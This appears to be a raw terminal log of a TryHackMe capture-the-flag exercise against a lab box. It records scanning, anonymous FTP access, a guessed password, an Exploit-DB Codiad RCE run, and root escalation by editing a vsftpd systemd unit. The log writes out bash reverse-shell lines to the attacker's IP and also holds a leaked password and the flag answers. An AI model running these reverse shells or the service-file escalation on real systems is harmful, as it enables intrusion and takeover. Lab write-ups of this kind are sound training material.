┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ nmap -sC -sV -Pn 10.10.23.28 -oN nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-07 13:56 EST
Nmap scan report for 10.10.23.28
Host is up (0.019s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.10.188
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_  256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.20 seconds

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ gobuster dir -u http://10.10.23.28/ -w /usr/share/dirb/wordlists/common.txt -o gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.23.28/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/07 13:55:18 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 276]  
                                                 
===============================================================
2021/12/07 13:55:40 Finished
===============================================================

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ gobuster dir -u http://10.10.23.28:62337/ -w /usr/share/dirb/wordlists/common.txt -o gobuster_62337
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.23.28:62337/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/07 14:05:19 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/components           (Status: 301) [Size: 324] [--> http://10.10.23.28:62337/components/]
/data                 (Status: 301) [Size: 318] [--> http://10.10.23.28:62337/data/]      
/favicon.ico          (Status: 200) [Size: 1150]                                          
/index.php            (Status: 200) [Size: 5239]                                          
/js                   (Status: 301) [Size: 316] [--> http://10.10.23.28:62337/js/]        
/languages            (Status: 301) [Size: 323] [--> http://10.10.23.28:62337/languages/] 
/lib                  (Status: 301) [Size: 317] [--> http://10.10.23.28:62337/lib/]       
/plugins              (Status: 301) [Size: 321] [--> http://10.10.23.28:62337/plugins/]   
/server-status        (Status: 403) [Size: 279]                                           
/themes               (Status: 301) [Size: 320] [--> http://10.10.23.28:62337/themes/]    
                                                                                          
===============================================================
2021/12/07 14:05:38 Finished
===============================================================

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ ftp 10.10.23.28          
Connected to 10.10.23.28.
220 (vsFTPd 3.0.3)
Name (10.10.23.28:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 18 06:10 .
drwxr-xr-x    3 0        114          4096 Jun 18 06:10 ..
drwxr-xr-x    2 0        0            4096 Jun 18 06:11 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             151 Jun 18 06:11 -
drwxr-xr-x    2 0        0            4096 Jun 18 06:11 .
drwxr-xr-x    3 0        114          4096 Jun 18 06:10 ..
226 Directory send OK.
ftp> get ./-
local: ./- remote: ./-
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ./- (151 bytes).
226 Transfer complete.
151 bytes received in 0.00 secs (62.9906 kB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ cat ./-                            
Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

# Search for default password for Codiad 2.8.4
CODIAD_PASSWORD : Codiad application password. Default: bitnami. -- No Luck
Could have bruteforced with burpsuite, but tried obvious ones first: admin, password -- It was password

# Login but nothing useful so search for public exploits

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ searchsploit codiad 2.8.4                                
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                        |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Codiad 2.8.4 - Remote Code Execution (Authenticated)                                                                                                                  | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)                                                                                                              | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)                                                                                                              | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)                                                                                                              | multiple/webapps/50474.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
                                                     
┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ locate multiple/webapps/49705.py
/usr/share/exploitdb/exploits/multiple/webapps/49705.py
                                                         
┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ cp /usr/share/exploitdb/exploits/multiple/webapps/49705.py 49705.py
                                    
┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ python3 49705.py                               
Usage : 
        python 49705.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
        python 49705.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example : 
        python 49705.py http://localhost/ admin admin 8.8.8.8 8888 linux
        python 49705.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author : 
        WangYihang <wangyihanger@gmail.com>
                                                           
┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ python3 49705.py http://10.10.23.28:62337/ john password 10.9.10.188 4444 linux
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/10.9.10.188/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] Y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...
who{"status":"error","message":"No Results Returned"}
[+] Exploit finished!
[+] Enjoy your reverse shell!

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ nc -lvnp 4445                                                                                                                                                                                130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.23.28.
Ncat: Connection from 10.10.23.28:33938.
bash: cannot set terminal process group (956): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ide:/var/www/html/codiad/components/filemanager$ find / -name user.txt 2>/dev/null
<ents/filemanager$ find / -name user.txt 2>/dev/null      
/home/drac/user.txt
www-data@ide:/var/www/html/codiad/components/filemanager$ cd /home/drac
cd /home/drac
www-data@ide:/home/drac$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@ide:/home/drac$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@ide:/home/drac$ cat /.bash_history
cat /.bash_history
cat: /.bash_history: No such file or directory
www-data@ide:/home/drac$ cat .bash_history
cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ ssh drac@10.10.23.28
drac@10.10.23.28's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec  7 19:50:21 UTC 2021

  System load:  0.0               Processes:           111
  Usage of /:   50.0% of 8.79GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0: 10.10.23.28
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

69 packages can be updated.
1 update is a security update.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Dec  7 19:33:52 2021 from 10.9.10.188
drac@ide:~$ cat user.txt
02930d21a8eb009f6d26361b2d24a466
drac@ide:~$ sudo -l
[sudo] password for drac: 
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart
drac@ide:~$ nano /lib/systemd/system/vsftpd.service

 GNU nano 2.9.3                                                                      /lib/systemd/system/vsftpd.service
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.10.188/2222 0>&1'  --This line was changed to create a reverse shell
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

drac@ide:~$ sudo /usr/sbin/service vsftpd restart
Warning: The unit file, source configuration file or drop-ins of vsftpd.service changed on disk. Run 'systemctl daemon-reload' to reload units.
drac@ide:~$ systemctl daemon-reload
==== AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon ===
Authentication is required to reload the systemd state.                                                                                                                                                 
Authenticating as: drac
Password: 
==== AUTHENTICATION COMPLETE ===
drac@ide:~$ sudo /usr/sbin/service vsftpd restart    

┌──(kali㉿kali)-[~/Documents/TryHackMe/IDE]
└─$ nc -lvnp 2222                                                                                                                                                                                 130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::2222
Ncat: Listening on 0.0.0.0:2222
    
Ncat: Connection from 10.10.23.28.
Ncat: Connection from 10.10.23.28:40800.
bash: cannot set terminal process group (4287): Inappropriate ioctl for device
bash: no job control in this shell
root@ide:/# 
root@ide:/# whoami
whoami
root
root@ide:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ide:/# find / -name root.txt 2>/dev/null
find / -name root.txt 2>/dev/null
/root/root.txt
root@ide:/# cat /root/root.txt 
cat /root/root.txt
ce258cb16f47f1c66f0b0b77f4e0fb8d
